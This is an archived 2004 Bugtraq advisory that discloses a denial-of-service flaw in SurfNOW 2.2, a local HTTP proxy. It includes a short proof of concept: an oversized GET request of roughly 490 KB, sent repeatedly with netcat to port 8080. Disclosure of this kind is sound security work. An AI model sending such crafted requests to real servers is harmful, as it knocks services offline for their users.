lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002c01c3e5a6$2a565a60$c9b5623e@BlueHell>
Date: Wed, 28 Jan 2004 14:53:49 +0100
From: "Donato Ferrante" <fdonato@...istici.org>
To: <bugtraq@...urityfocus.com>
Subject: Denial Of Service in SurfNOW 2.2


                           Donato Ferrante


Application:  SurfNOW
              http://www.loomsoft.com/

Version:      2.2

Bug:          Denial Of Service

Author:       Donato Ferrante
              e-mail: fdonato@...istici.org
              web:    www.autistici.org/fdonato



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"SurfNOW is a simple local HTTP Proxy Server (running on your computer)
without cache. SurfNOW protects your privacy while on the Internet as
well as speeds up your downloads, especially if you are trying to get
several files form overseas or from otherwise rather slow server.
It can also completely hide your IP address by dynamically connecting
to non-transparent anonymizing public proxy servers. You can also test
a list of proxy servers and sort them by connection speed and level
of anonimity."



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
2. The bug:
------------

The bug is in the http header handling, so is possible to send crafted
big strings to the server and it will not work correctly.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability send to the server a string like:

[1] "GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n"


For example, if you use netcat you can test the bug, using:

nc -v -v host 8080 < testFile.txt
( note: "testFile.txt" is a file of 490 Kb as [1] )

and repeating this, for example 7 times.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

Bug will be fixed in the next version of SurfNOW.
So go on the Loomsoft's official website, http://www.loomsoft.com/
and check for the next version of SurfNOW.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ